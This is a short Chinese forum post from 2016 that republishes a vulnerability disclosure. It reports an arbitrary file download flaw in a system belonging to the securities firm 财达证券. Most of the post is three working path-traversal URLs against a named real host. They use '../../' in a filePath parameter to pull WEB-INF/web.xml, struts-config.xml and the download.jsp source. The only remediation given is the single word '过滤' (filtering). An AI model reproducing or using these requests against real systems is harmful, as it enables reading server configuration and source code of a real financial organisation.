HanDs
管理员

[7月漏洞公开] 财达证券某系统存在任意文件下载漏洞 



任意文件下载漏洞

详细说明:

code 区域
http://im.cdzq.com:9901/PersonalPortal/download.jsp?filePath=/upload/b4629ba2-b587-4eb9-85d8-8d87426ca796/../../WEB-INF/web.xml&fileName=web.xml



QQ截图20160526105828.png



漏洞证明:

http://im.cdzq.com:9901/PersonalPortal/download.jsp?filePath=/upload/b4629ba2-b587-4eb9-85d8-8d87426ca796/../../WEB-INF/struts-config.xml&fileName=1.txt

QQ截图20160526112725.png



http://im.cdzq.com:9901/PersonalPortal/download.jsp?filePath=/upload/b4629ba2-b587-4eb9-85d8-8d87426ca796/../../download.jsp&fileName=1.txt



QQ截图20160526112854.png

修复方案:

过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
证券 系统 存在 任意 文件下载 漏洞
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组
快速回复